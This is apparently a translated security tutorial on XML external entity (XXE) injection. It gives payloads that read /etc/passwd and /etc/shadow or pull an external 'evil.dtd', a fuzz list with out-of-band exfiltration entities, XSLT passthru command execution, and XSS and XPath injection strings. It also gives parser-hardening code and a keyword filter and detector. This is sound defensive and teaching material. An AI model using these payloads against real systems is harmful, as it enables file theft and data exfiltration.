Application Security - XXE (XML External Entity Injection): Attack and Defense Notes


    libxml 2.9.1 and later do not resolve external entities by default. For testing, PHP 5.2 (libxml version 2.7.7) and PHP 5.3 (libxml version 2.7.8) were used on Windows. On Linux, a libxml version older than 2.9.1 must be compiled into PHP; the libxml version in use can be checked with phpinfo().

    External entity injection - via an external entity declaration in the DTD

    payload-1
    <?xml version="1.0"?> <!DOCTYPE a [<!ENTITY b SYSTEM "file://etc/passwd">]> <c>&b;</c>

    payload-2

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <user>
    <firstname>&xxe;</firstname>
    <lastname>melody</lastname>
    </user>

    External entity injection - the DTD references an external DTD document, which in turn declares the external entity

    <?xml version="1.0"?>
    <!DOCTYPE a SYSTEM "http://mark4z5.com/evil.dtd">
    <c>&b;</c>
    
    Contents of the DTD:
    <!ENTITY b SYSTEM "file:///etc/passwd">

    External entity injection - via an external entity declaration pulled in by a parameter entity in the DTD

    <?xml version="1.0"?>
    <!DOCTYPE a [
    <!ENTITY % d SYSTEM "http://mark4z5.com/evil.dtd">
    %d;
    ]>
    <c>&b;</c>
    
    Contents of the DTD:
    <!ENTITY b SYSTEM "file:///etc/passwd">

    Protocols supported in the DTD part of XML (entity URIs)

    Parser     Protocols
    libxml2    file http ftp
    PHP        file http ftp php compress.zlib compress.bzip2 data glob phar
               Supported through extensions (wrapper -> extension):
                 https/ftps                                           openssl
                 zip                                                  zip
                 ssh2.shell/ssh2.exec/ssh2.tunnel/ssh2.sftp/ssh2.scp  ssh2
                 rar                                                  rar
                 ogg                                                  oggvorbis
                 expect                                               expect
    Java       http https ftp file jar netdoc mailto gopher *
    .NET       file http https ftp

    Tool - Burp - Collaborator

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE copyright [
    <!ENTITY test SYSTEM "http://<random value generated by Collaborator>">
    ]>
    followed by the XML body

    XML Schema entity attacks - schemaLocation


    XML Schema entity attacks - noNamespaceSchemaLocation


    XML Schema entity attacks - XInclude


    XML Schema entity attacks - XSLT attack

    XXE - reading arbitrary files


    XXE - executing system commands


    XXE - probing internal network ports


    XXE - attacking internal web sites


    XXE - DDoS attack


    Defense - disable external entities

    PHP:
    libxml_disable_entity_loader(true);
    
    Java:
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    dbf.setExpandEntityReferences(false);
    
    Python:
    from lxml import etree
    xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
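An added example, not code from the original post: a parser built only on Python's standard library (`xml.parsers.expat` feeding `xml.etree.ElementTree.TreeBuilder`) that applies the same control as the lxml snippet above and goes one step further by refusing the DOCTYPE itself, so none of the three payload shapes shown earlier (inline external entity, external DTD, parameter entity) has anywhere to declare an entity. The names `safe_parse`, `rejection_reason` and `UnsafeXML` are my own; the sample documents are constructed from payload-2 and the parameter-entity payload on this page.

```python
"""Hardened XML parsing with only the Python standard library.

Added example (not from the original post). Like the post's lxml snippet it
refuses to resolve entities, but it also rejects the DOCTYPE itself: with no
DTD there is no place to declare an external entity, a parameter entity or an
entity-expansion bomb, and the rejection happens before any URI is fetched.
"""
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET


class UnsafeXML(ValueError):
    """Raised when the document contains a DTD construct we refuse to process."""


def safe_parse(data: bytes) -> ET.Element:
    """Parse untrusted XML into an Element tree, refusing all DTD constructs."""
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()

    # Parameter entities (%name;) are never loaded, even if a DOCTYPE got this far.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE not allowed (root={name!r}, SYSTEM={sysid!r}, PUBLIC={pubid!r})")

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        raise UnsafeXML(f"{kind} entity declaration not allowed: {name!r} -> {sysid or value!r}")

    def reject_external(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity reference not allowed: {sysid!r}")

    # An exception raised inside an expat handler stops the parser and
    # propagates out of Parse(), so nothing after the offending construct runs.
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external

    # Ordinary element content is forwarded to ElementTree's TreeBuilder.
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data

    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    return builder.close()


def rejection_reason(data: bytes):
    """Return the UnsafeXML message for `data`, or None when the document is accepted."""
    try:
        safe_parse(data)
    except UnsafeXML as exc:
        return str(exc)
    return None


# Constructed sample inputs: payload-2 and the parameter-entity payload from the
# post, plus a harmless document of the same shape as payload-2.
PAYLOAD_2 = (
    b'<?xml version="1.0" encoding="ISO-8859-1"?>'
    b'<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>'
    b"<user><firstname>&xxe;</firstname><lastname>melody</lastname></user>"
)
PAYLOAD_PARAM = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE a [<!ENTITY % d SYSTEM "http://mark4z5.com/evil.dtd">%d;]>'
    b"<c>&b;</c>"
)
BENIGN = b"<user><firstname>mark</firstname><lastname>melody</lastname></user>"

if __name__ == "__main__":
    print("payload-2      :", rejection_reason(PAYLOAD_2))
    print("parameter ent. :", rejection_reason(PAYLOAD_PARAM))
    print("benign         :", rejection_reason(BENIGN), safe_parse(BENIGN).findtext("lastname"))
```

Rejecting the DOCTYPE outright is stricter than only turning off entity resolution, and it is what most applications want: documents exchanged over an API almost never need a DTD. If internal entities are genuinely required, keep the `ExternalEntityRefHandler` and `SetParamEntityParsing` controls and drop only the DOCTYPE handler.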

    Defense - filter user-submitted XML data

    Keywords: <!DOCTYPE, <!ENTITY, SYSTEM, PUBLIC

    Fuzzing

     1 <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >
     2 <?xml version="1.0" encoding="ISO-8859-1"?>
     3 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
     4 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
     5 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
     6 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
     7 <?xml version="1.0" encoding="ISO-8859-1"?><test></test>
     8 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
     9 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    10 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo>
    11 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]>
    12 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
    13 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
    14 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
    15 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
    16 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo>
    17 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]>
    18 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
    19 <test></test>
    20 <![CDATA[<test></test>]]>
    21 &foo;
    22 %foo;
    23 count(/child::node())
    24 x' or name()='username' or 'x'='y
    25 <name>','')); phpinfo(); exit;/*</name>
    26 <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
    27 <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
    28 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
    29 <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
    30 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
    31 <foo><![CDATA[' or 1=1 or ''=']]></foo>
    32 <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    33 <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    34 <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    35 <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    36 <xml SRC="xsstest.xml" ID=I></xml>
    37 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
    38 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
    39 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet>
    40 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet>
    41 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet>
    42 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    43 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
    44 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
    45 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]>
    46 <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]>
    47 <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'>  "> %int;
    48 <!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>">
    49 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
    50 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
    51 <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
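An added example, not from the original post, that turns the keyword filter recommended under "Defense - filter user-submitted XML data" into code and, using a handful of strings copied from the fuzz list above as a constructed corpus, shows what a plain keyword match catches and what it misses. `dtd_keywords()` checks for the four keywords the post names; `classify()` adds narrower signatures (tag names such as `external_general_entity` are my own, not a standard) that label the technique so a WAF alert or log review can say what was attempted, including the XSLT and split-CDATA cases the keyword list does not cover.

```python
"""Keyword filter and technique signatures for user-submitted XML.

Added example, not from the original post. dtd_keywords() is the filter the
post recommends; classify() adds narrower, named signatures (the names are
this example's own) for log review and WAF alerting. The sample corpus is
copied from the fuzz list and payloads on the page.
"""
import re

# Keywords the post lists under "filter user-submitted XML data".
DTD_KEYWORDS = ("<!DOCTYPE", "<!ENTITY", "SYSTEM", "PUBLIC")

# (tag, pattern) pairs, checked against the raw request body.
SIGNATURES = [
    # <!DOCTYPE a SYSTEM "http://..."> : the whole DTD is fetched from outside
    ("external_dtd", re.compile(r"<!DOCTYPE\s+\S+\s+(?:SYSTEM|PUBLIC)\b")),
    # <!ENTITY xxe SYSTEM "file:///..."> : classic XXE through a general entity
    ("external_general_entity", re.compile(r"<!ENTITY\s+(?!%)\S+\s+(?:SYSTEM|PUBLIC)\b")),
    # <!ENTITY % p ...>, including the &#37; / &#x25; spellings used in nested declarations
    ("parameter_entity", re.compile(r"<!ENTITY\s+(?:%|&#37;|&#x25;)\s*\S+")),
    # <!ENTITY foo "aaaa"> : internal entity only; low severity alone, building block of expansion bombs
    ("internal_entity", re.compile(r"<!ENTITY\s+(?!%)\S+\s+[\"']")),
    # XSLT: document() reads local files, php:function() calls PHP from a stylesheet
    ("xslt_document", re.compile(r"<xsl:\S+[^>]*\bdocument\(")),
    ("xslt_php_function", re.compile(r"php:function\(")),
    # <![CDATA[<]]>SCRIPT<![CDATA[>]]> : markup split across CDATA sections
    ("cdata_split_markup", re.compile(r"<!\[CDATA\[<\]\]>")),
]


def dtd_keywords(xml_text: str) -> list:
    """Keywords from the post's list present in the raw input, in list order.

    Matching is case-sensitive on purpose: XML parsers honour only the upper-case
    spelling, so a lower-case "system" in body text is not a DTD keyword.
    """
    return [kw for kw in DTD_KEYWORDS if kw in xml_text]


def classify(xml_text: str) -> set:
    """Set of signature tags matching the raw input (empty set = nothing flagged)."""
    return {tag for tag, rx in SIGNATURES if rx.search(xml_text)}


# Constructed corpus: entries copied from the fuzz list (keyed by its numbering)
# plus the external-DTD payload shown earlier on the page.
FUZZ_SAMPLES = {
    "4": '<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>',
    "7": '<?xml version="1.0" encoding="ISO-8859-1"?><test></test>',
    "8": '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>',
    "27": "<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>",
    "40": '''<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet>''',
    "41": '''<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet>''',
    "47": '''<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'>  "> %int;''',
    "51": '<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>',
    "ext_dtd": '<?xml version="1.0"?><!DOCTYPE a SYSTEM "http://mark4z5.com/evil.dtd"><c>&b;</c>',
}

if __name__ == "__main__":
    for key, sample in FUZZ_SAMPLES.items():
        print(f"{key:>8}: keywords={dtd_keywords(sample)} tags={sorted(classify(sample))}")
```

Run the scan on the raw request body before any parsing: sample 51 carries its DOCTYPE inside a CDATA section, which a filter working on parsed text would skip. Samples 27, 40 and 41 match none of the four keywords, so the keyword list alone covers XXE proper and nothing else. Treat the filter as a detection layer; the parser-level controls in the Defense section are what actually stop an entity from being loaded.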

    Detection tools

    XXEinjector  -  Ruby-based
Original source: https://www.cnblogs.com/AtesetEnginner/p/11261653.html